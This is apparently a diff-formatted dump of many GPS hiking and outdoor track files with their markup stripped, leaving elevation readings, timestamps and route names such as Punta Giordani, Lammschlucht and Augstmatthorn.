+2013-09-28T15:11:38Z
+
+
+2800.9
+2013-09-28T15:11:55Z
+
+
+2806.7
+2013-09-28T15:12:38Z
+
+
+2807.0
+2013-09-28T15:13:28Z
+
+
+2785.0
+2013-09-28T15:16:49Z
+
+
+2784.2
+2013-09-28T15:20:25Z
+
+
+2013-09-28T15:20:57Z
+
+
+
+2013-09-28T15:20:58Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-05-25T06:22:06Z
+
+
+24-MAI-15
+
+
+
+
+
+
+938.3840332
+
+
+972.9916992
+
+
+984.0466309
+
+
+1007.5991211
+
+
+1018.1733398
+
+
+1033.5544434
+
+
+1049.4162598
+
+
+1076.333252
+
+
+1081.6203613
+
+
+1098.9240723
+
+
+1101.8083496
+
+
+1106.6147461
+
+
+1110.9406738
+
+
+1116.2280273
+
+
+1122.9572754
+
+
+1131.6088867
+
+
+1137.3769531
+
+
+1145.5480957
+
+
+1149.8742676
+
+
+1152.2773438
+
+
+1154.2001953
+
+
+1160.9291992
+
+
+1169.5812988
+
+
+1185.923584
+
+
+1201.3046875
+
+
+1205.1499023
+
+
+1213.3212891
+
+
+1225.8181152
+
+
+1234.9509277
+
+
+1244.5639648
+
+
+1242.1606445
+
+
+1249.8513184
+
+
+1251.2932129
+
+
+1251.7739258
+
+
+1264.2709961
+
+
+1313.7788086
+
+
+1325.3146973
+
+
+1341.1765137
+
+
+1345.0217285
+
+
+1365.6901855
+
+
+1384.435791
+
+
+1389.2424316
+
+
+1399.8168945
+
+
+1416.1591797
+
+
+1430.5791016
+
+
+1440.1923828
+
+
+1450.2861328
+
+
+1459.8991699
+
+
+1465.6672363
+
+
+1456.0539551
+
+
+1455.5734863
+
+
+1454.6120605
+
+
+1455.5734863
+
+
+1454.1315918
+
+
+1447.8828125
+
+
+1423.3693848
+
+
+1420.0046387
+
+
+1391.645752
+
+
+1374.8227539
+
+
+1341.1765137
+
+
+1300.3205566
+
+
+1277.2490234
+
+
+1261.8679199
+
+
+1193.1333008
+
+
+1191.6914063
+
+
+1185.923584
+
+
+1183.0395508
+
+
+1175.348877
+
+
+1167.1779785
+
+
+1157.0839844
+
+
+1148.9128418
+
+
+1146.9899902
+
+
+1151.3161621
+
+
+1146.0288086
+
+
+1141.7028809
+
+
+1140.7414551
+
+
+1140.7414551
+ "
+"
+
+
+
+
+
+
+
+Linie
+
+
+
+1808.2
+
+
+1829.2
+
+
+1849.0
+
+
+1850.0
+
+
+1858.9
+
+
+1882.0
+
+
+1886.9
+
+
+1888.5
+
+
+1891.2
+
+
+1893.1
+
+
+1893.7
+
+
+1891.9
+
+
+1888.7
+
+
+1888.1
+
+
+1892.5
+
+
+1890.3
+
+
+1891.9
+
+
+1892.0
+
+
+1893.8
+
+
+1898.9
+
+
+1914.3
+
+
+1916.4
+
+
+1932.1
+
+
+1949.4
+
+
+1950.9
+
+
+1942.9
+
+
+1927.3
+
+
+1930.6
+
+
+1935.5
+
+
+1937.0
+
+
+1937.2
+
+
+1937.6
+
+
+1939.9
+
+
+1941.8
+
+
+1944.4
+
+
+1946.3
+
+
+1948.5
+
+
+1952.6
+
+
+1962.2
+
+
+1971.5
+
+
+1973.3
+
+
+1970.0
+
+
+1968.3
+
+
+1963.5
+
+
+1963.1
+
+
+1969.2
+
+
+1975.1
+
+
+1976.8
+
+
+1978.4
+
+
+1978.8
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+Punta Giordani
+
+
+
+3280.0
+2011-07-30T06:34:24Z
+
+
+3281.0
+2011-07-30T06:35:23Z
+
+
+3284.0
+2011-07-30T06:37:11Z
+
+
+3288.0
+2011-07-30T06:39:00Z
+
+
+3313.0
+2011-07-30T06:41:45Z
+
+
+3327.0
+2011-07-30T06:44:09Z
+
+
+3400.0
+2011-07-30T06:54:22Z
+
+
+3410.0
+2011-07-30T06:55:52Z
+
+
+3431.0
+2011-07-30T06:57:46Z
+
+
+3446.0
+2011-07-30T06:59:40Z
+
+
+3473.0
+2011-07-30T07:04:06Z
+
+
+3500.0
+2011-07-30T07:08:46Z
+
+
+3525.0
+2011-07-30T07:13:01Z
+
+
+3552.0
+2011-07-30T07:16:21Z
+
+
+3589.0
+2011-07-30T07:21:48Z
+
+
+3610.0
+2011-07-30T07:24:26Z
+
+
+3652.0
+2011-07-30T07:31:05Z
+
+
+3671.0
+2011-07-30T07:33:11Z
+
+
+3693.0
+2011-07-30T07:35:44Z
+
+
+3722.0
+2011-07-30T07:42:48Z
+
+
+3741.0
+2011-07-30T07:44:43Z
+
+
+3774.0
+2011-07-30T07:49:58Z
+
+
+3798.0
+2011-07-30T07:53:38Z
+
+
+3823.0
+2011-07-30T07:58:31Z
+
+
+3864.0
+2011-07-30T08:05:33Z
+
+
+3872.0
+2011-07-30T08:07:28Z
+
+
+3985.0
+2011-07-30T08:27:29Z
+
+
+4023.0
+2011-07-30T08:33:08Z
+
+
+4047.0
+2011-07-30T08:38:33Z
+
+
+4050.0
+2011-07-30T08:42:48Z
+
+
+4048.0
+2011-07-30T08:45:53Z
+
+
+4016.0
+2011-07-30T08:49:56Z
+
+
+3931.0
+2011-07-30T08:55:54Z
+
+
+3910.0
+2011-07-30T08:57:05Z
+
+
+3861.0
+2011-07-30T08:59:13Z
+
+
+3819.0
+2011-07-30T09:01:54Z
+
+
+3784.0
+2011-07-30T09:04:30Z
+
+
+3700.0
+2011-07-30T09:10:14Z
+
+
+3662.0
+2011-07-30T09:11:39Z
+
+
+3635.0
+2011-07-30T09:13:09Z
+
+
+3498.0
+2011-07-30T09:21:37Z
+
+
+3362.0
+2011-07-30T09:29:57Z
+
+
+3324.0
+2011-07-30T09:32:15Z
+
+
+3307.0
+2011-07-30T09:33:10Z
+
+
+3287.0
+2011-07-30T09:33:59Z
+
+
+3274.0
+2011-07-30T09:36:00Z
+
+
+3275.0
+2011-07-30T09:36:56Z
+ "
+"
+
+
+
+
+
+
+
+MMPASS B
+
+
+
+2203.8
+
+
+2200.4
+
+
+2202.8
+
+
+2225.7
+
+
+2204.8
+
+
+2232.5
+
+
+2235.8
+
+
+2227.3
+
+
+2234.7
+
+
+2222.1
+
+
+2225.4
+
+
+2233.3
+
+
+2225.6
+
+
+2224.0
+
+
+2236.6
+
+
+2230.6
+
+
+2231.6
+
+
+2236.8
+
+
+2235.0
+
+
+2233.3
+
+
+2228.2
+
+
+2227.7
+
+
+2229.3
+
+
+2221.0
+
+
+2232.2
+
+
+2225.5
+
+
+2221.6
+
+
+2225.3
+
+
+2224.8
+
+
+2232.8
+
+
+2225.8
+
+
+2232.5
+
+
+2231.5
+
+
+2239.1
+
+
+2245.9
+
+
+2252.1
+
+
+2257.7
+
+
+2280.8
+
+
+2290.3
+
+
+2307.4
+
+
+2306.4
+
+
+2315.1
+
+
+2328.9
+
+
+2326.8
+
+
+2339.2
+
+
+2330.7
+
+
+2334.2
+
+
+2340.6
+
+
+2353.4
+
+
+2356.1
+
+
+2371.4
+
+
+2392.6
+
+
+2389.7
+
+
+2396.8
+
+
+2411.1
+
+
+2415.2
+
+
+2423.7
+
+
+2439.5
+
+
+2463.4
+
+
+2472.6
+
+
+2485.1
+
+
+2494.3
+
+
+2505.3
+
+
+2534.0
+
+
+2556.8
+
+
+2589.5
+
+
+2638.1
+
+
+2654.6
+
+
+2701.4
+
+
+2713.6
+
+
+2723.2
+
+
+2756.4
+
+
+2780.4
+
+
+2803.4
+
+
+2815.4
+
+
+2826.4
+
+
+2821.3
+
+
+2836.3
+ "
+"
+
+
+Tourenplanung am 19. Juli 2016
+
+TemporaryUserGroup
+
+
+
+2016-07-19T19:20:14Z
+
+Tourenplanung am 19. Juli 2016
+
+
+
+1926.20328
+
+
+1924.55269
+
+
+1917.89667
+
+
+1926.72934
+
+
+1930.29777
+
+
+1940.68677
+
+
+1956.02508
+
+
+1968.65461
+
+
+2012.90998
+
+
+2018.74538
+
+
+2024.0246
+
+
+2025.83295
+
+
+2027.85848
+
+
+2027.99089
+
+
+2027.6758
+
+
+2029.05025
+
+
+2027.65106
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-07-05T10:28:05Z
+
+AAALUG-14 12:28:01 PM
+
+
+
+
+
+1882.4
+2014-07-05T08:29:05Z
+
+
+1954.5
+2014-07-05T08:42:51Z
+
+
+1957.38
+2014-07-05T08:44:03Z
+
+
+1967.48
+2014-07-05T08:46:33Z
+
+
+1972.28
+2014-07-05T08:47:57Z
+
+
+1977.09
+2014-07-05T08:49:29Z
+
+
+1977.57
+2014-07-05T08:50:00Z
+
+
+1977.57
+2014-07-05T08:53:14Z
+
+
+1977.09
+2014-07-05T08:54:41Z
+
+
+1977.57
+2014-07-05T08:56:06Z
+
+
+1978.53
+2014-07-05T08:57:09Z
+
+
+1980.45
+2014-07-05T08:57:44Z
+
+
+1979.97
+2014-07-05T08:58:22Z
+
+
+1979.01
+2014-07-05T08:59:20Z
+
+
+1979.01
+2014-07-05T09:00:03Z
+
+
+1979.97
+2014-07-05T09:01:33Z
+
+
+1985.26
+2014-07-05T09:03:52Z
+
+
+1996.32
+2014-07-05T09:06:54Z
+
+
+2017.46
+2014-07-05T09:09:36Z
+
+
+2028.04
+2014-07-05T09:11:19Z
+
+
+2034.77
+2014-07-05T09:12:42Z
+
+
+2061.2
+2014-07-05T09:16:29Z
+
+
+2065.53
+2014-07-05T09:17:08Z
+
+
+2077.55
+2014-07-05T09:18:25Z
+
+
+2086.68
+2014-07-05T09:19:46Z
+
+
+2092.45
+2014-07-05T09:21:11Z
+
+
+2095.33
+2014-07-05T09:22:35Z
+
+
+2098.7
+2014-07-05T09:23:19Z
+
+
+2114.08
+2014-07-05T09:25:22Z
+
+
+2126.09
+2014-07-05T09:26:54Z
+
+
+2136.19
+2014-07-05T09:28:09Z
+
+
+2154.93
+2014-07-05T09:30:21Z
+
+
+2161.66
+2014-07-05T09:31:31Z
+
+
+2174.16
+2014-07-05T09:32:49Z
+
+
+2186.18
+2014-07-05T09:34:10Z
+
+
+2203.0
+2014-07-05T09:35:52Z
+
+
+2211.17
+2014-07-05T09:36:55Z
+
+
+2220.78
+2014-07-05T09:38:12Z
+
+
+2226.07
+2014-07-05T09:39:15Z
+
+
+2240.01
+2014-07-05T09:41:10Z
+
+
+2246.74
+2014-07-05T09:41:49Z
+
+
+2255.87
+2014-07-05T09:43:09Z
+
+
+2265.0
+2014-07-05T09:46:17Z
+
+
+2284.71
+2014-07-05T09:51:15Z
+
+
+2296.25
+2014-07-05T09:52:41Z
+
+
+2333.74
+2014-07-05T09:58:08Z
+
+
+2365.46
+2014-07-05T10:02:24Z
+
+
+2397.67
+2014-07-05T10:06:33Z
+
+
+2422.66
+2014-07-05T10:10:06Z
+
+
+2437.56
+2014-07-05T10:11:54Z
+
+
+2449.58
+2014-07-05T10:13:11Z
+
+
+2471.69
+2014-07-05T10:16:03Z
+
+
+2491.39
+2014-07-05T10:18:18Z
+
+
+2530.33
+2014-07-05T10:22:47Z
+
+
+2522.16
+2014-07-05T10:23:59Z
+
+
+2526.96
+2014-07-05T10:24:52Z
+
+
+2547.15
+2014-07-05T10:27:57Z
+ "
+"
+
+
+
+
+
+
+
+2014-05-18 14:31:57
+
+
+
+410.14
+
+
+408.7
+
+
+409.66
+
+
+406.29
+
+
+405.33
+
+
+406.29
+
+
+409.66
+
+
+409.18
+
+
+409.66
+
+
+410.14
+
+
+412.06
+
+
+412.54
+
+
+413.02
+
+
+412.54
+
+
+413.02
+
+
+413.02
+
+
+412.54
+
+
+414.47
+
+
+416.39
+
+
+413.5
+
+
+413.98
+
+
+413.98
+
+
+413.98
+
+
+414.95
+
+
+413.98
+
+
+414.47
+
+
+413.02
+
+
+413.5
+
+
+413.5
+
+
+413.98
+
+
+414.47
+
+
+414.47
+
+
+414.95
+
+
+415.43
+
+
+414.95
+
+
+414.95
+
+
+415.43
+
+
+415.43
+
+
+414.95
+
+
+416.87
+
+
+416.39
+
+
+416.39
+
+
+415.91
+
+
+418.79
+
+
+417.83
+
+
+417.83
+
+
+416.87
+
+
+417.83
+
+
+416.39
+
+
+419.27
+
+
+420.23
+
+
+422.16
+
+
+421.19
+
+
+417.83
+
+
+416.87
+
+
+417.83
+
+
+418.31
+
+
+416.39
+
+
+414.95
+
+
+416.87
+
+
+415.43
+
+
+416.39
+
+
+415.91
+
+
+415.91
+
+
+421.19
+
+
+417.35
+
+
+416.39
+
+
+417.83
+
+
+422.64
+
+
+422.16
+
+
+423.12
+
+
+417.35
+
+
+419.27
+
+
+421.19
+
+
+420.71
+
+
+417.35
+
+
+417.35
+
+
+417.83
+
+
+413.5
+
+
+413.02
+
+
+416.87
+
+
+415.43
+
+
+415.91
+
+
+415.91
+
+
+416.39
+
+
+416.39
+ "
+"
+
+
+
+Federal Office of Topography Switzerland
+
+
+
+
+
+
+
+2015-05-25T11:17:08Z
+
+
+2015-05-25T11:17:08Z
+
+
+2015-05-25T11:19:08Z
+
+
+2015-05-25T11:20:08Z
+
+
+2015-05-25T11:23:08Z
+
+
+2015-05-25T11:26:08Z
+
+
+2015-05-25T11:29:08Z
+
+
+2015-05-25T11:30:08Z
+
+
+2015-05-25T11:32:08Z
+
+
+2015-05-25T11:34:08Z
+
+
+2015-05-25T11:37:08Z
+
+
+2015-05-25T11:37:08Z
+
+
+2015-05-25T11:37:08Z
+
+
+2015-05-25T11:37:08Z
+
+
+2015-05-25T11:39:08Z
+
+
+2015-05-25T11:41:08Z
+
+
+2015-05-25T11:44:08Z
+
+
+2015-05-25T11:45:08Z
+
+
+2015-05-25T11:46:08Z
+
+
+2015-05-25T11:47:08Z
+
+
+2015-05-25T11:54:08Z
+
+
+2015-05-25T11:56:08Z
+
+
+2015-05-25T12:01:08Z
+
+
+2015-05-25T12:02:08Z
+
+
+2015-05-25T12:03:08Z
+
+
+2015-05-25T12:05:08Z
+
+
+2015-05-25T12:07:08Z
+
+
+2015-05-25T12:08:08Z
+
+
+2015-05-25T12:10:08Z
+
+
+2015-05-25T12:10:08Z
+
+
+2015-05-25T12:14:08Z
+
+
+2015-05-25T12:17:08Z
+
+
+2015-05-25T12:17:08Z
+
+
+2015-05-25T12:21:08Z
+
+
+2015-05-25T12:23:08Z
+
+
+2015-05-25T12:27:08Z
+
+
+2015-05-25T12:29:08Z
+
+
+2015-05-25T12:30:08Z
+
+
+2015-05-25T12:32:08Z
+
+
+2015-05-25T12:35:08Z
+
+
+2015-05-25T12:44:08Z
+
+
+2015-05-25T12:44:08Z
+
+
+2015-05-25T12:52:08Z
+
+
+2015-05-25T12:54:08Z
+
+
+2015-05-25T12:57:08Z
+
+
+2015-05-25T13:01:08Z
+
+
+2015-05-25T13:07:08Z
+
+
+2015-05-25T13:08:08Z
+
+
+2015-05-25T13:12:08Z
+
+
+2015-05-25T13:14:08Z
+
+
+2015-05-25T13:15:08Z
+
+
+2015-05-25T13:17:08Z
+
+
+2015-05-25T13:17:08Z
+
+
+2015-05-25T13:19:08Z
+
+
+2015-05-25T13:23:08Z
+
+
+2015-05-25T13:25:08Z
+
+
+2015-05-25T13:26:08Z
+
+
+2015-05-25T13:31:08Z
+
+
+2015-05-25T13:36:08Z
+
+
+2015-05-25T13:37:08Z
+
+
+2015-05-25T13:40:08Z
+
+
+2015-05-25T13:40:08Z
+
+
+2015-05-25T13:43:08Z
+
+
+2015-05-25T13:44:08Z
+
+
+2015-05-25T13:48:08Z
+
+
+2015-05-25T13:48:08Z
+
+
+2015-05-25T13:48:08Z
+
+
+2015-05-25T13:51:08Z
+
+
+2015-05-25T13:52:08Z
+
+
+2015-05-25T13:56:08Z
+
+
+2015-05-25T13:57:08Z
+
+
+2015-05-25T13:57:08Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-06-03T14:54:26Z
+
+2015-06-03 16:54:23
+
+
+
+
+
+
+1082.75
+2015-06-03T14:32:57Z
+
+
+1077.87
+2015-06-03T14:33:32Z
+
+
+1077.67
+2015-06-03T14:34:05Z
+
+
+1068.91
+2015-06-03T14:34:36Z
+
+
+1061.05
+2015-06-03T14:35:06Z
+
+
+1065.55
+2015-06-03T14:35:42Z
+
+
+1072.47
+2015-06-03T14:36:53Z
+
+
+1176.45
+2015-06-03T14:43:10Z
+
+
+1195.39
+2015-06-03T14:44:44Z
+
+
+1174.77
+2015-06-03T14:47:16Z
+
+
+1159.8
+2015-06-03T14:48:40Z
+
+
+1152.69
+2015-06-03T14:50:21Z
+
+
+1156.84
+2015-06-03T14:51:31Z
+
+
+1162.49
+2015-06-03T14:52:09Z
+
+
+1164.89
+2015-06-03T14:52:44Z
+ "
+"
+
+
+Eptingen - Walten - Läufelfingen
+
+
+
+
+
+
+
+
+
+539.8
+
+
+536.6
+
+
+524.8
+
+
+525.6
+
+
+535.6
+
+
+538.5
+
+
+541.8
+
+
+550.7
+
+
+563.5
+
+
+606.0
+
+
+621.2
+
+
+634.9
+
+
+637.5
+
+
+636.8
+
+
+640.7
+
+
+612.5
+
+
+582.4
+
+
+583.2
+
+
+585.6
+
+
+584.7
+
+
+607.6
+
+
+653.7
+
+
+656.5
+
+
+678.1
+
+
+681.7
+
+
+702.6
+
+
+720.3
+
+
+751.3
+
+
+764.3
+
+
+782.1
+
+
+773.2
+
+
+747.3
+
+
+740.3
+
+
+753.1
+
+
+769.0
+
+
+790.5
+
+
+792.1
+
+
+801.3
+
+
+810.0
+
+
+844.1
+
+
+868.0
+
+
+892.8
+
+
+907.0
+
+
+898.3
+
+
+885.8
+
+
+870.2
+
+
+864.7
+
+
+857.7
+
+
+850.4
+
+
+840.0
+
+
+832.8
+
+
+763.4
+
+
+760.0
+
+
+759.8
+
+
+749.7
+
+
+716.9
+
+
+695.0
+
+
+675.2
+
+
+668.6
+
+
+649.0
+
+
+641.5
+
+
+635.9
+
+
+610.7
+
+
+602.1
+
+
+583.9
+
+
+565.2
+
+
+561.4
+
+
+558.8
+
+
+558.8
+
+
+559.0
+ "
+"
+
+
+Amrum Norsspitze
+
+Gerhard Weber - Community
+
+
+
+2016-04-02T19:17:06Z
+
+Amrum Norsspitze
+
+
+
+2.0
+
+
+5.0
+
+
+7.3
+
+
+2.5
+
+
+1.3
+
+
+1.62534
+
+
+2.74343
+
+
+1.39997
+
+
+1.91357
+
+
+1.34864
+
+
+-0.30047
+
+
+1.23615
+
+
+1.39299
+
+
+0.4888
+
+
+3.55565
+
+
+3.37097
+
+
+1.84756
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-06-25T15:34:23Z
+
+
+Traccia corrente: 25 GIU 2015 08:15
+
+
+
+
+
+
+457.72
+2015-06-25T06:15:51Z
+
+
+458.69
+2015-06-25T06:16:51Z
+
+
+463.01
+2015-06-25T06:17:51Z
+
+
+469.74
+2015-06-25T06:19:21Z
+
+
+474.55
+2015-06-25T06:22:21Z
+
+
+491.85
+2015-06-25T06:25:21Z
+
+
+517.81
+2015-06-25T06:29:21Z
+
+
+544.72
+2015-06-25T06:34:51Z
+
+
+575.01
+2015-06-25T06:40:21Z
+
+
+601.92
+2015-06-25T06:43:51Z
+
+
+625.47
+2015-06-25T06:47:21Z
+
+
+642.78
+2015-06-25T06:49:51Z
+
+
+652.87
+2015-06-25T06:51:21Z
+
+
+689.88
+2015-06-25T06:56:51Z
+
+
+785.53
+2015-06-25T07:58:20Z
+
+
+798.03
+2015-06-25T08:02:48Z
+
+
+802.36
+2015-06-25T08:04:48Z
+
+
+806.68
+2015-06-25T08:07:17Z
+
+
+838.41
+2015-06-25T08:40:17Z
+
+
+834.08
+2015-06-25T08:41:17Z
+
+
+861.0
+2015-06-25T08:46:17Z
+
+
+864.84
+2015-06-25T08:47:17Z
+
+
+876.86
+2015-06-25T08:49:17Z
+
+
+874.94
+2015-06-25T08:51:17Z
+
+
+885.03
+2015-06-25T08:55:47Z
+
+
+888.4
+2015-06-25T08:56:17Z
+
+
+895.61
+2015-06-25T08:57:17Z
+
+
+901.85
+2015-06-25T08:58:17Z
+
+
+908.58
+2015-06-25T08:59:17Z
+
+
+914.83
+2015-06-25T09:00:17Z
+
+
+919.64
+2015-06-25T09:01:47Z
+
+
+917.72
+2015-06-25T09:22:17Z
+
+
+917.72
+2015-06-25T09:23:47Z
+
+
+917.24
+2015-06-25T09:24:13Z
+
+
+915.31
+2015-06-25T09:24:43Z
+
+
+899.45
+2015-06-25T09:26:13Z
+
+
+868.21
+2015-06-25T09:30:13Z
+
+
+859.08
+2015-06-25T09:31:13Z
+
+
+842.73
+2015-06-25T09:33:13Z
+
+
+822.06
+2015-06-25T09:36:43Z
+
+
+814.37
+2015-06-25T09:38:13Z
+
+
+817.26
+2015-06-25T09:40:13Z
+
+
+820.14
+2015-06-25T09:41:43Z
+
+
+818.22
+2015-06-25T09:42:13Z
+
+
+793.22
+2015-06-25T09:44:43Z
+
+
+776.4
+2015-06-25T09:46:43Z
+
+
+760.06
+2015-06-25T09:48:43Z
+
+
+746.6
+2015-06-25T09:50:13Z
+
+
+723.53
+2015-06-25T09:52:43Z
+
+
+700.94
+2015-06-25T09:54:43Z
+
+
+686.52
+2015-06-25T09:56:43Z
+
+
+662.49
+2015-06-25T09:59:43Z
+
+
+645.66
+2015-06-25T10:01:42Z
+
+
+632.68
+2015-06-25T10:03:12Z
+
+
+606.25
+2015-06-25T10:05:42Z
+
+
+597.12
+2015-06-25T10:06:42Z
+
+
+577.89
+2015-06-25T10:08:42Z
+
+
+565.39
+2015-06-25T10:09:42Z
+
+
+557.22
+2015-06-25T10:10:42Z
+
+
+523.09
+2015-06-25T10:13:42Z
+
+
+491.85
+2015-06-25T10:16:42Z
+
+
+470.22
+2015-06-25T10:18:42Z
+
+
+455.8
+2015-06-25T10:19:42Z
+
+
+444.27
+2015-06-25T10:20:42Z
+
+
+443.31
+2015-06-25T10:21:12Z
+
+
+451.48
+2015-06-25T10:22:42Z
+
+
+455.32
+2015-06-25T10:23:47Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Lammschlucht
+
+
+
+
+
+
+Lammschlucht
+
+
+
+716.35
+
+
+716.3799999999999
+
+
+718.4999999999997
+
+
+721.8599999999996
+
+
+723.0499999999995
+
+
+725.7899999999995
+
+
+727.3499999999993
+
+
+727.7599999999994
+
+
+728.5999999999993
+
+
+728.97
+
+
+733.1199999999999
+
+
+735.1199999999999
+
+
+736.5999999999998
+
+
+738.5299999999996
+
+
+737.9899999999997
+
+
+740.4799999999993
+
+
+739.2099999999994
+
+
+749.6499999999993
+
+
+744.7399999999993
+
+
+748.2799999999994
+
+
+747.4799999999994
+
+
+752.24
+
+
+751.7100000000002
+
+
+751.3500000000003
+
+
+763.4800000000001
+
+
+770.2099999999999
+
+
+771.6899999999998
+
+
+802.5799999999998
+
+
+812.28
+
+
+811.4799999999998
+
+
+814.05
+
+
+814.64
+
+
+806.6899999999999
+
+
+815.3799999999999
+
+
+821.9099999999999
+
+
+815.6399999999999
+
+
+810.7999999999996
+
+
+824.5099999999995
+
+
+822.4999999999998
+
+
+813.1899999999997
+
+
+803.63
+
+
+818.65
+
+
+821.31
+
+
+835.52
+
+
+847.4300000000002
+
+
+826.6900000000004
+
+
+827.7700000000003
+
+
+833.0300000000003
+
+
+839.2400000000001
+
+
+837.6999999999999
+
+
+832.59
+
+
+832.4799999999999
+
+
+832.6399999999999
+
+
+824.0600000000001
+
+
+822.5000000000002
+
+
+829.4899999999999
+
+
+832.63
+
+
+836.9200000000001
+
+
+837.92
+
+
+847.0399999999996
+
+
+849.7999999999996
+
+
+852.1599999999997
+
+
+854.4299999999995
+
+
+854.75
+
+
+855.6799999999997
+
+
+866.0299999999997
+
+
+866.9899999999997
+
+
+866.33
+
+
+865.3100000000001
+
+
+873.7400000000002
+
+
+902.1300000000003
+
+
+896.9200000000003
+
+
+882.4600000000002
+
+
+883.14
+ "
+"
+
+
+KOMPASS Digital Map Track
+
+
+
+
+2017-07-27T16:10:10Z
+
+
+Haritzersteig 22.07
+
+
+
+
+
+
+1262.25
+1970-01-01T00:00:00Z
+
+
+1263.17
+1970-01-01T00:00:00Z
+
+
+1269.04
+1970-01-01T00:00:00Z
+
+
+1262.73
+1970-01-01T00:00:00Z
+
+
+1266.94
+1970-01-01T00:00:00Z
+
+
+1266.19
+1970-01-01T00:00:00Z
+
+
+1267.56
+1970-01-01T00:00:00Z
+
+
+1261.52
+1970-01-01T00:00:00Z
+
+
+1273.23
+1970-01-01T00:00:00Z
+
+
+1283.02
+1970-01-01T00:00:00Z
+
+
+1291.88
+1970-01-01T00:00:00Z
+
+
+1298.02
+1970-01-01T00:00:00Z
+
+
+1306.44
+1970-01-01T00:00:00Z
+
+
+1307.43
+1970-01-01T00:00:00Z
+
+
+1335.77
+1970-01-01T00:00:00Z
+
+
+1333.44
+1970-01-01T00:00:00Z
+
+
+1344.12
+1970-01-01T00:00:00Z
+
+
+1352.45
+1970-01-01T00:00:00Z
+
+
+1370.38
+1970-01-01T00:00:00Z
+
+
+1371.49
+1970-01-01T00:00:00Z
+
+
+1384.52
+1970-01-01T00:00:00Z
+
+
+1400.39
+1970-01-01T00:00:00Z
+
+
+1403.11
+1970-01-01T00:00:00Z
+
+
+1433.76
+1970-01-01T00:00:00Z
+
+
+1460.88
+1970-01-01T00:00:00Z
+
+
+1496.96
+1970-01-01T00:00:00Z
+
+
+1498.17
+1970-01-01T00:00:00Z
+
+
+1519.62
+1970-01-01T00:00:00Z
+
+
+1560.18
+1970-01-01T00:00:00Z
+
+
+1565.23
+1970-01-01T00:00:00Z
+
+
+1565.97
+1970-01-01T00:00:00Z
+
+
+1547.44
+1970-01-01T00:00:00Z
+
+
+1530.58
+1970-01-01T00:00:00Z
+
+
+1519.59
+1970-01-01T00:00:00Z
+
+
+1492.72
+1970-01-01T00:00:00Z
+
+
+1484.68
+1970-01-01T00:00:00Z
+
+
+1468.66
+1970-01-01T00:00:00Z
+
+
+1465.33
+1970-01-01T00:00:00Z
+
+
+1453.2
+1970-01-01T00:00:00Z
+
+
+1447.24
+1970-01-01T00:00:00Z
+
+
+1431.45
+1970-01-01T00:00:00Z
+
+
+1433.35
+1970-01-01T00:00:00Z
+
+
+1434.66
+1970-01-01T00:00:00Z
+
+
+1432.4
+1970-01-01T00:00:00Z
+
+
+1418.38
+1970-01-01T00:00:00Z
+
+
+1434.74
+1970-01-01T00:00:00Z
+
+
+1444.62
+1970-01-01T00:00:00Z
+
+
+1431.81
+1970-01-01T00:00:00Z
+
+
+1401.34
+1970-01-01T00:00:00Z
+
+
+1380.46
+1970-01-01T00:00:00Z
+
+
+1381.17
+1970-01-01T00:00:00Z
+
+
+1352.64
+1970-01-01T00:00:00Z
+
+
+1356.22
+1970-01-01T00:00:00Z
+
+
+1338.98
+1970-01-01T00:00:00Z
+
+
+1330.96
+1970-01-01T00:00:00Z
+
+
+1311.98
+1970-01-01T00:00:00Z
+
+
+1301.45
+1970-01-01T00:00:00Z
+
+
+1291.06
+1970-01-01T00:00:00Z
+
+
+1289.44
+1970-01-01T00:00:00Z
+
+
+1280.8
+1970-01-01T00:00:00Z
+
+
+1280.49
+1970-01-01T00:00:00Z
+
+
+1264.35
+1970-01-01T00:00:00Z
+
+
+1259.76
+1970-01-01T00:00:00Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+2018-03-22T08:32:35Z
+50.0
+
+2d
+3
+
+0.0
+
+226.0
+2018-03-22T10:11:28Z
+50.0
+
+3d
+5
+
+0.0
+
+341.0
+2018-03-22T11:21:41Z
+50.0
+
+3d
+6
+
+0.1
+60.2
+
+384.0
+2018-03-22T11:36:13Z
+50.0
+
+3d
+6
+
+0.0
+
+504.0
+2018-03-22T12:22:56Z
+50.0
+
+3d
+9
+
+0.0
+
+109.0
+2018-03-22T13:17:57Z
+50.0
+
+3d
+5
+
+0.0
+
+-160.0
+2018-03-22T13:35:52Z
+50.0
+
+3d
+6
+
+0.0 "
+"
+
+
+Augstmatthorn
+
+_mel_
+
+_mel_ on GPSies.com
+GPSiesUserOnWeb
+
+
+Augstmatthorn on GPSies.com
+trackOnWeb
+2014-11-02T18:29:37Z
+
+round trip
+604.0
+6811.3468075627425
+1556.0
+2099.0
+603.0
+
+Augstmatthorn on GPSies.com
+
+trackOnWeb
+
+
+1556.0
+2010-01-01T00:00:00Z
+
+
+1562.0
+2010-01-01T00:00:51Z
+
+
+1576.0
+2010-01-01T00:01:33Z
+
+
+1592.0
+2010-01-01T00:02:04Z
+
+
+1625.0
